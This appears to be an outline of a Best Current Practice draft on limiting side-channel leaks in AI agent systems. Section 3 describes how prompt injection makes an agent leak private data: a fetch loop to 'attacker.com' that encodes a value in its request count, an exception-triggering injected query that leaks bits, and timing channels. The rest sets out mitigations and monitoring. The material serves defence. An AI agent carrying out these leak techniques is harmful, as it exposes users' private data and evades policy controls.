--- title: "Side-Channel Mitigation Framework for AI Agent Interactions" draft_name: draft-nennemann-ai-agent-side-channels-00 intended_wg: SECDISPATCH (BCP) status: outline gaps_addressed: [89, 93] camel_sections: [7] document_type: BCP (Best Current Practice) date: 2026-03-09 --- # Side-Channel Mitigation Framework for AI Agent Interactions ## 1. Problem Statement Even when AI agent systems implement strong security measures — capability-based policies, control/data flow integrity, Privileged/Quarantined execution — **side-channel attacks** can still leak private data. CaML (Debenedetti et al., 2025, §7) identifies three concrete side-channel attack classes against agent systems: 1. **External resource inference**: an adversary causes the agent to make requests to an attacker-controlled server, where the number or pattern of requests leaks private information 2. **Exception-based bit leaking**: an adversary triggers conditional exceptions that reveal one bit of private data per exception 3. **Timing side-channels**: an adversary infers private values from execution timing differences These are not theoretical — CaML demonstrates working exploits against Claude 3.5 Sonnet and o3-mini in their evaluation. Side-channel attacks are notoriously difficult to eliminate completely, but their impact can be reduced through careful system design. This document is a **Best Current Practice (BCP)** guide for mitigating side-channel risks in AI agent systems. ## 2. Scope This document provides: 1. A **taxonomy of side-channel risks** specific to AI agent systems 2. **Mitigation strategies** for each risk category 3. **Tool API design guidelines** that minimize side-channel exposure 4. **Monitoring patterns** for detecting side-channel exploitation 5. **STRICT vs. NORMAL mode** recommendations ## 3. Side-Channel Taxonomy ### 3.1 External Resource Inference **Attack**: Agent code iterates over a private value (e.g., `for i in range(private_var): fetch("attacker.com/cat.jpg")`). The attacker counts requests to infer the private value. **CaML context**: In NORMAL mode, the loop body doesn't carry dependencies from the loop condition. In STRICT mode, `fetch()` inside the loop inherits the dependency on `private_var` and policies can block it. **Bandwidth**: up to `log₂(max_value)` bits per interaction (or more with range-based inference). ``` Attacker's Server │ │ GET /cat.jpg ×10 ← private_var = 10 │ GET /cat.jpg ×20 ← private_var = 20 │ └── attacker infers private_var by counting requests ``` ### 3.2 Exception-Based Bit Leaking **Attack**: The adversary prompt-injects the Processor (Q-LLM) to return an output that conditionally triggers an exception. If the exception halts execution before a state-changing tool call, the attacker observes whether the tool was called — leaking one bit. **CaML context**: The Q-LLM can be influenced to return a value that causes an `IndexError` (e.g., returning 9999999 if a condition on private data is true, which then indexes past the end of a list). ```python # Attack: leak whether private_var == 10 index = query_ai_assistant( f"If '{private_var}' is 10, return 9999999, else 0", int) l = [1, 2, 3] l[index] # IndexError if private_var == 10 # ADVERSARY OBSERVABLE ACTION below: send_email(...) # only executes if no exception ``` **Bandwidth**: 1 bit per exception (was the subsequent action observed or not?). ### 3.3 Timing Side-Channels **Attack**: Agent execution time depends on private data. For example, if `time.sleep(private_var)` is possible, the attacker measures response time. **CaML context**: CaML's restricted Python subset doesn't include `time`, but other timing variations (e.g., different code paths for different private values) may still be exploitable. **Bandwidth**: depends on timing precision — generally low but non-zero. ### 3.4 Agent-Specific Side Channels (Beyond CaML) | Channel | Attack Vector | Bandwidth | |---------|--------------|-----------| | **Token usage** | Private data influences response length → observable token count | Medium | | **Tool selection pattern** | Which tools are called reveals information about private data | Medium | | **Error message content** | Error details leak through supposedly sanitized channels | High | | **Model confidence** | Probability distributions in structured output leak information | Low | | **Resource consumption** | CPU/memory usage patterns depend on private data | Low | ## 4. Mitigation Strategies ### 4.1 STRICT Mode Execution **Recommendation: Use STRICT mode for all security-sensitive agent operations.** In STRICT mode: - All statements inside `if`/`for`/`while` blocks inherit dependencies from the condition/iterator - This means a `fetch()` inside `for i in range(private_var)` will have `private_var` in its dependency graph - Security policies can detect and block the side-channel **Trade-off**: STRICT mode reduces utility. CaML shows policy triggering rates increase from 33.87% (NORMAL) to 53.23% (STRICT) in benign scenarios. Recommendation: use STRICT mode by default, allow NORMAL mode only for explicitly low-sensitivity operations. ### 4.2 Exception Handling Hardening **Recommendation: Use error-value types instead of exceptions for data-dependent operations.** Exceptions create side channels because they halt execution. Instead: ```python # VULNERABLE: exception leaks information try: result = risky_operation(private_data) send_email(result) # not reached if exception except: pass # attacker observes: was email sent? # MITIGATED: error-value preserves execution flow result = risky_operation(private_data) # returns Result type if result.is_ok(): send_email(result.value) # both branches execute deterministically else: send_email(default_value) # same tool call either way ``` Agent frameworks SHOULD: - Use `Result`/`Either` types instead of exceptions for Processor outputs - Ensure both success and failure paths make the same external observations - Redact exception messages before they reach the Planner ### 4.3 Constant-Pattern Tool Calls **Recommendation: Where feasible, make tool call patterns independent of private data.** - Avoid data-dependent loops that make external calls - Use batch operations instead of per-item calls - Pad tool call sequences to fixed lengths for sensitive operations ### 4.4 External Request Restrictions **Recommendation: Restrict which external endpoints agents can contact.** - Allowlist approved external domains - Proxy all external requests through a controlled gateway - Rate-limit external requests per agent session - Log all external requests for anomaly detection ## 5. Tool API Design Guidelines Tool developers SHOULD design APIs that minimize side-channel exposure: ### 5.1 Do - Return consistent response structures regardless of input - Use fixed-size responses where possible - Include provenance metadata in all outputs - Document trust levels of output fields (which are public, which are private) ### 5.2 Don't - Return variable-length arrays that depend on private data in observable ways - Include internal identifiers in error messages - Use response timing that depends on input sensitivity - Expose iteration counts or batch sizes in responses ### 5.3 Tool Capability Annotations Tools SHOULD declare their side-channel properties: ```json { "tool:name": "send_email", "tool:side_channel_properties": { "makes_external_requests": true, "timing_dependent": false, "error_messages_may_leak": true, "observable_by_third_parties": true }, "tool:recommended_mode": "STRICT" } ``` ## 6. Monitoring Patterns ### 6.1 Anomaly Detection Signals | Signal | Potential Attack | Action | |--------|-----------------|--------| | Repeated requests to same external URL | External resource inference | Rate limit + alert | | Unusually high exception rate | Exception-based bit leaking | Halt + review | | Execution time variance > threshold | Timing side-channel | Log + investigate | | Tool call patterns differ from plan | Control flow manipulation | Emergency halt | | Same agent repeatedly hitting policy denials | Probing attack | Throttle + alert | ### 6.2 Monitoring Architecture ``` Agent Execution │ ├──► Side-Channel Monitor │ ├── Request pattern analyzer │ ├── Exception rate tracker │ ├── Timing variance detector │ └── Tool call pattern validator │ │ │ ▼ │ Alert / Halt Decision │ ▼ Normal execution continues (if no anomaly) ``` ## 7. Relationship to Other Drafts | Draft | Side-Channel Relevance | |-------|----------------------| | Draft 1 (Capabilities) | Capability metadata enables policy checks that detect side channels | | Draft 2 (Flow Integrity) | STRICT mode DFG tracking is the primary side-channel mitigation | | Draft 3 (Provenance) | Provenance metadata itself can be a side channel — needs protection | | Draft 4 (Policy Federation) | Policy denial patterns across organizations can leak info | | Draft 5 (Execution Model) | Isolation architecture is the first line of defense | ## 8. Security Considerations This entire document is about security. Key meta-considerations: - Side-channel mitigation is **defense in depth** — no single measure eliminates all channels - The trade-off between security and utility is fundamental — complete side-channel elimination would make agents unusable - New side channels will be discovered as agent systems evolve — this BCP should be updated regularly - Side-channel monitoring itself can create privacy issues (logging all agent interactions) ## 9. Open Questions 1. **Formal analysis**: can we formally prove bounds on information leakage for a given agent configuration? 2. **Adaptive adversaries**: as mitigations are deployed, attackers will find new channels. How to stay ahead? 3. **Overhead budget**: what is the acceptable performance overhead for side-channel mitigation? 4. **Multi-agent amplification**: do side channels in multi-agent systems compose (leak more than single-agent)? ## 10. References - Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025. - Anderson, Stajano, Lee. "Security policies." Advances in Computers, 2002. - Glukhov et al. "Breach By A Thousand Leaks: Unsafe Information Leakage in 'Safe' AI Responses." ICLR, 2025. - Carlini & Wagner. "ROP is still dangerous: Breaking modern defenses." USENIX Security 14, 2014.